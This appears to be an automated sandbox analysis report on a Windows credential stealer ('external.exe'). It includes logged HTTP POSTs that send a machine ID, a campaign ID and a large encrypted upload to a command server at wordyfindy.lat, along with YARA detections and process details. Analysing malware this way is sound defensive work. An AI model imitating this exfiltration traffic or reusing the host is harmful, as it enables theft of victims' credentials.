                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MplL%2Bd3P5cH1AGuK9HEC%2F7eFeJV6KDrMd%2B%2FfcDMKYK9rn%2BgSsWk6cYBU0aJmU9HJy8rR%2BtR8XCsa5k%2B%2F9NfA41pWr6nQuTFX%2F4eQfGNOzhMbWa3UecH8gIlSVL775tUgow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbd369e87cff-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2001&rtt_var=766&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21390&delivery_rate=1413359&cwnd=222&unsent_bytes=0&cid=f96a4b193dd7d51a&ts=981&x=0"
                                                                                                        2024-12-22 23:12:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-22 23:12:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.449740104.21.19.354437140C:\Users\user\Desktop\external.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-22 23:12:23 UTC276OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=NAO7Q2RF23FZTLB
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 1244
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:23 UTC1244OUTData Raw: 2d 2d 4e 41 4f 37 51 32 52 46 32 33 46 5a 54 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 4e 41 4f 37 51 32 52 46 32 33 46 5a 54 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 41 4f 37 51 32 52 46 32 33 46 5a 54 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d 67 0d 0a
                                                                                                        Data Ascii: --NAO7Q2RF23FZTLBContent-Disposition: form-data; name="hwid"8F02EEFF079BF58F303C757AA71AA852--NAO7Q2RF23FZTLBContent-Disposition: form-data; name="pid"1--NAO7Q2RF23FZTLBContent-Disposition: form-data; name="lid"LPnhqo--alaeljhsfdmg
                                                                                                        2024-12-22 23:12:24 UTC1127INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:24 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=ood9halc2plsij1q7gvoanml9p; expires=Thu, 17 Apr 2025 16:59:03 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7pP38f9Z0AjJs%2BNZqOfNFyhFMkqBRxKac2PmkFuKGqtwVZ9fr6H6M3F00NR8C4ZdcdFcNvyIqxbrsqNlCKaM5aANOvB5MGU%2F5A2NZEcv7zYNfI3ZfzccDbdaburNWBu%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbe3cbfec468-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1604&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2156&delivery_rate=1820448&cwnd=235&unsent_bytes=0&cid=2613d620aa42e735&ts=1084&x=0"
                                                                                                        2024-12-22 23:12:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-22 23:12:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.449742104.21.19.354437140C:\Users\user\Desktop\external.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-22 23:12:26 UTC273OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=NHUHIGZRFF
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 568452
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d 67 0d 0a 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43
                                                                                                        Data Ascii: --NHUHIGZRFFContent-Disposition: form-data; name="hwid"8F02EEFF079BF58F303C757AA71AA852--NHUHIGZRFFContent-Disposition: form-data; name="pid"1--NHUHIGZRFFContent-Disposition: form-data; name="lid"LPnhqo--alaeljhsfdmg--NHUHIGZRFFC
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: d8 7d a6 23 be 02 03 52 cc 09 80 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba 0a a5 6b 2d d4 0c 2a c5 0d fd 46 28 1f 93 e4 73 26 f1 99 d9 69
                                                                                                        Data Ascii: }#Rog1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j*\9-Wi]ORQk-*F(s&i
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 72 61 77 70 12 3e d8 4b b4 dc e1 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1 64 7e fd 46 ba 04 34 a1 5d 4b 6e 50 af a3 c4 af 22 bd 6f 25 04
                                                                                                        Data Ascii: rawp>K+6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@d~F4]KnP"o%
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: e2 65 4d 26 12 87 08 b7 d0 b7 8f 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb 07 f6 ef de 88 fb 9d 50 43 e6 e7 5c 22 14 34 2d 65 fb 72 3c 9c
                                                                                                        Data Ascii: eM&oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?PC\"4-er<
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: b8 cc 97 5f 7a 20 c1 29 04 f5 8f 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54 d5 6f cb 28 d6 31 17 ef ff ad a2 f8 ff be 20 38 1b 09 8f 04 70
                                                                                                        Data Ascii: _z )`"yDe\^s+Fh!C##0u^~ESc 7Ba5*<Dt[@|M5"5*}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~*x6m^*|.To(1 8p
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 27 b3 34 f0 d0 5c cc b8 75 6e 5d 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06 7f 14 fa 8e 0e 85 f5 88 b6 1e 48 af 0f a3 50 eb 70 99 b6 3f a6
                                                                                                        Data Ascii: '4\un]%,un!"__]-CJ BOLy|vyTvs~8kQ*gi0(4RwVf"BM=a)c[eg0'mZFwA*!9-H`l`?DTjtJ24a)*STYHPp?
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 1c 2d 07 55 6b f4 36 4b 2a 6e 67 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09 85 17 1a ba 7c f7 ec 67 5f c6 cc 26 6f 2d 41 61 14 2e 83 fc c3
                                                                                                        Data Ascii: -Uk6K*ngzb,ha"C@95mueu5@7O~1zM1j;N"3#I|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?*rHPWv|g_&o-Aa.
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 06 d9 67 30 1c 23 a3 db 7f 22 8c 5e eb fa c8 6c 27 83 28 00 ca 4b c7 cb cb 0d bc e2 00 3e 78 41 bb 3e 5c da d1 8f 33 95 71 19 10 fa fd 82 d3 dd 8c 3f eb b6 d7 b5 1b 15 af 67 a8 70 65 ce 91 f4 b7 ec 2d 17 b5 ae d2 b8 c1 1f 82 45 b7 5a b9 7c e7 d8 da 31 73 48 4a 66 a5 ca a6 3d 3b 7d d2 d6 fb 2a d0 a7 a5 1f cd 68 0d cd a7 a9 73 13 82 77 a5 4f d9 c0 71 f0 df 94 fe 6f 3d 83 37 0d 01 a1 00 ea c1 4b 1a db 70 84 83 9d bf ad 8d 7f a0 67 07 6d bc 2e 08 da 1a 3b c9 a9 62 1e dc 41 3e 96 df c5 e6 f4 1a 0b c4 28 65 0e be 97 03 5a 47 68 d7 3f a7 e5 2a b6 dc 0e d0 7e 1c fe f9 8e f1 2d 2d 30 5d 12 d5 80 a8 f4 3e 71 24 08 13 65 2d 00 6e a1 d0 bc 4b a7 9c 09 93 a2 c3 ae 52 32 bb ea f2 bd ba a5 fe 26 79 4a 8d 09 9a 94 61 20 e1 7a 03 b0 63 dc 9b fa 1d 20 4f 38 c2 5e 14 50 f3
                                                                                                        Data Ascii: g0#"^l'(K>xA>\3q?gpe-EZ|1sHJf=;}*hswOqo=7Kpgm.;bA>(eZGh?*~--0]>q$e-nKR2&yJa zc O8^P
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 02 9e 8a 28 75 a9 40 68 ec 79 c7 aa 97 c5 1d 36 84 eb 5b 88 7b 0e 72 c7 7c 41 bd 3a a3 6f 21 66 3d 0c a6 c1 a1 17 16 c3 55 fa e0 c3 b2 2d 13 54 2a 76 d6 9f 86 0a c3 41 92 a8 f3 ab 95 3a 47 c2 64 b6 46 03 cb 06 b8 35 ba 23 89 84 8e 36 c4 a5 de 42 3f be 8b 42 20 a9 cd a4 f1 f6 ba b1 53 53 60 aa cc 9e 62 94 d9 3d 0b e1 0d 89 d5 bd d2 ef 0a 88 5e a2 c2 5a 56 7d 61 51 61 93 b8 77 e6 6d 98 23 6e 5a 57 30 e7 a1 d8 c5 2b 2e 11 c6 bc 2a fd 6e 96 5e a6 a3 b9 04 7f 6e 3f 8c f0 98 4e 8e 67 74 d7 6f d6 ee 9d e0 39 76 c5 54 18 15 4a 5d 9f 19 a2 ef 86 95 66 79 75 4a b1 65 e9 d3 6e da 19 00 47 85 99 ad 79 c3 d7 f5 26 b2 03 e2 37 ad 74 db b3 19 52 9c ab 06 d4 6b 6d 84 ae 1e b6 c7 51 ac ae c2 65 55 3d 70 49 bb 30 6d 30 59 75 9c a9 3f be 7e 26 2a 34 40 64 40 28 59 e9 c7 cc
                                                                                                        Data Ascii: (u@hy6[{r|A:o!f=U-T*vA:GdF5#6B?B SS`b=^ZV}aQawm#nZW0+.*n^n?Ngto9vTJ]fyuJenGy&7tRkmQeU=pI0m0Yu?~&*4@d@(Y
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: c0 3b 19 3d 24 78 da 27 9a 6e 1e f2 63 bb 65 7f b2 c9 d5 ad 1f cf 84 35 c0 c9 75 3b 75 fe cf 00 c7 d5 4a 58 22 ae 90 17 e8 ac dd f6 ba 75 d7 f9 28 f5 07 12 ed 57 7b eb 5d 92 1c f8 2d 77 4a 17 f7 bc 4e 1c c2 71 55 02 aa a4 6f 7e 54 49 78 8b 21 da d6 a0 b0 83 ca bb d1 c7 f6 1a c1 8e 90 6c 15 38 5c 7f 3d 2d cc 4d a5 71 b7 09 ef e9 d1 77 9d f8 bc a8 a1 98 f9 ab 66 69 1d e2 b7 88 42 9f 1d a8 5d c9 a1 03 77 e4 36 ec af ad 7d 14 c1 73 5f d0 45 69 18 c3 43 82 4a 8a 09 96 d9 82 af 8f 6a 7d 8a 7e b3 c9 3e 52 ec 01 65 3b 79 a9 4b 7b 51 29 2e d8 b9 f1 62 e1 bb ce cd 91 bc 2c 0c c7 cd 4c 7a 1a 03 e1 e6 5c 9b b1 e3 6b 6f 6b a2 8f 60 f5 5b b9 9d 4e 06 8a 6b b5 71 a4 2a 3e 7c 62 b0 86 5e 9b d8 1c 8d 30 6c f2 37 8b e0 5d 5d 91 8f 89 ec 91 cf 0b 6b 62 f9 97 67 99 1a a3 01
                                                                                                        Data Ascii: ;=$x'nce5u;uJX"u(W{]-wJNqUo~TIx!l8\=-MqwfiB]w6}s_EiCJj}~>Re;yK{Q).b,Lz\kok`[Nkq*>|b^0l7]]kbg
                                                                                                        2024-12-22 23:12:29 UTC1147INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:29 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=gn6bu4et9ugokk2s8cfplbn3ei; expires=Thu, 17 Apr 2025 16:59:07 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pEaMkxYul5kxooF%2FgQOhxmv3uIyETeDyHx%2BuM9RXNrp6fupv92%2BsBk%2Fv%2BA%2FgMmu%2FsR5eCEAAm%2B%2FBMs98VlnZ0k9RnyjiiVj%2BCYXice5xcj239ustdU8ZG2jm64rPAZ4Oag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbf4efb0436f-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1723&rtt_var=941&sent=337&recv=599&lost=0&retrans=0&sent_bytes=2831&recv_bytes=570989&delivery_rate=1005856&cwnd=182&unsent_bytes=0&cid=d4dd4f4f05e1d5bf&ts=3762&x=0"


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:18:11:57
                                                                                                        Start date:22/12/2024
                                                                                                        Path:C:\Users\user\Desktop\external.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\external.exe"
                                                                                                        Imagebase:0x6f0000
                                                                                                        File size:564'224 bytes
                                                                                                        MD5 hash:88CD76E4609E50C6435EBC4771427D2C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:18:11:57
                                                                                                        Start date:22/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:18:11:57
                                                                                                        Start date:22/12/2024
                                                                                                        Path:C:\Users\user\Desktop\external.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\external.exe"
                                                                                                        Imagebase:0x6f0000
                                                                                                        File size:564'224 bytes
                                                                                                        MD5 hash:88CD76E4609E50C6435EBC4771427D2C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:10.2%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:3.4%
                                                                                                          Total number of Nodes:443
                                                                                                          Total number of Limit Nodes:4
                                                                                                          execution_graph 22279 701a70 GetStringTypeW __Getwctype 21842 707074 21 API calls CallUnexpected 22280 706e74 60 API calls 2 library calls 22184 71507c LeaveCriticalSection std::_Lockit::~_Lockit 22283 704665 16 API calls 22288 712259 55 API calls 2 library calls 22189 704059 70 API calls 22192 6fb440 39 API calls 22289 6f7240 49 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22290 701e40 20 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22292 702a4c 9 API calls 3 library calls 22196 703c33 47 API calls 2 library calls 22296 70663d 49 API calls _unexpected 22197 6f2820 76 API calls 22297 70fe20 36 API calls __strnicoll 22198 71e825 49 API calls 22201 70a02c GetCommandLineA GetCommandLineW 22300 6fc230 62 API calls 22204 706815 DecodePointer 22302 6f3200 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22206 701c00 6 API calls 2 library calls 22303 701a00 6 API calls 2 library calls 22306 718ef6 29 API calls 4 library calls 22208 7020fd 33 API calls std::_Throw_Cpp_error 22209 6fb4e0 29 API calls std::_Throw_Cpp_error 22211 6f30f0 31 API calls std::_Throw_Cpp_error 22310 6faef0 125 API calls 22213 70f4d5 7 API calls 22214 6facc0 48 API calls 22313 7186cb 44 API calls 3 library calls 22315 6fd2d0 62 API calls 22317 714ace 34 API calls 2 library calls 22218 7078b1 8 API calls 22320 703eba 69 API calls codecvt 22219 7070bb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 22220 706cbb GetModuleHandleW GetProcAddress GetProcAddress 22322 714abc GetProcessHeap 22324 70a6a3 66 API calls 22221 713ca7 FreeLibrary 22223 701c90 LCMapStringEx __Towlower 22325 702693 DeleteCriticalSection 22326 718a9d 41 API calls 3 library calls 22225 709889 47 API calls 4 library calls 22330 6f2290 103 API calls 22227 704175 68 API calls 22229 721578 43 API calls __strnicoll 22230 71897d 42 API calls 3 library calls 22234 702163 48 API calls 2 library calls 22336 703b64 31 API calls 22337 710f64 66 API calls _Fputc 22239 70f95d 68 API calls ___scrt_uninitialize_crt 22341 71835e 11 API calls 3 library calls 22342 6f5f40 95 API calls 3 library calls 22240 707940 40 API calls 5 library calls 22343 704348 72 API calls shared_ptr 22242 716948 43 API calls 2 library calls 22244 72194f 20 API calls 22248 702934 16 API calls 2 library calls 22346 714b37 15 API calls 21843 706f39 21844 706f45 ___scrt_is_nonwritable_in_current_image 21843->21844 21869 7024ec 21844->21869 21846 706f4c 21847 7070a5 21846->21847 21857 706f76 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 21846->21857 21900 706528 4 API calls 2 library calls 21847->21900 21849 7070ac 21850 7070b2 21849->21850 21893 70c9bd 21849->21893 21901 70c9d3 21 API calls CallUnexpected 21850->21901 21853 7070ba 21854 706f95 21855 707016 21880 70ef3c 21855->21880 21857->21854 21857->21855 21896 70ca07 39 API calls 4 library calls 21857->21896 21859 70701c 21884 6f1c20 21859->21884 21863 70703d 21863->21849 21864 707041 21863->21864 21865 70704a 21864->21865 21898 70c9e9 21 API calls CallUnexpected 21864->21898 21899 702525 75 API calls ___scrt_uninitialize_crt 21865->21899 21868 707053 21868->21854 21870 7024f5 21869->21870 21902 706194 IsProcessorFeaturePresent 21870->21902 21872 702501 21903 7078c5 10 API calls 2 library calls 21872->21903 21874 702506 21875 70250a 21874->21875 21904 709dff 21874->21904 21875->21846 21878 702521 21878->21846 21881 70ef45 21880->21881 21882 70ef4a 21880->21882 21917 70f065 57 API calls 21881->21917 21882->21859 21918 6f2460 21884->21918 21888 6f1c6a 21934 6f2870 40 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21888->21934 21890 6f1c85 21891 702303 